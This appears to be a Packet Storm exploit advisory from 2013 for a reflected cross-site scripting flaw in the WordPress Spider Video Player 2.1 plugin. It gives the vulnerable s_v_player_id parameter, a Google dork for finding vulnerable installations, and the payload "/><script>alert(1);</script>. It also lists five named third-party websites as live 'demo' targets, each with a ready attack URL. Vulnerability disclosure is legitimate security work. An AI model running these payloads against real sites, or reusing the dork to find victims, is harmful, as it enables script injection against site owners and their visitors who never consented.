WordPress Spider Video Player plugin version 2.1 suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
0e78928906e5653dc9bd2fd0223f5e08f4a0edaab80aeaa7a50b00179cb63ae7====================================================================
# Exploit Title : WordPress Spider Video Player 2.1 Cross site scripting
Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://web-dorado.com/
# Google Dork : inurl:wp-content/plugins/player/settings.php
# Date: 2013-12-09
# Tested on: Windows 7 & Linux
# discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross site scripting
#
# Location :
localhost/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
#
http://www.adethefade.com/wp-content/plugins//player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
http://www.beton-mobile-tp.fr/blog-beton/wp-content/plugins//player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
www.sonorapalaciosjr.cl/demos/wordpress/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
#
http://www.extravagancelingerie.com.br/site/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
http://www.cintro.com.br/wordpress/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed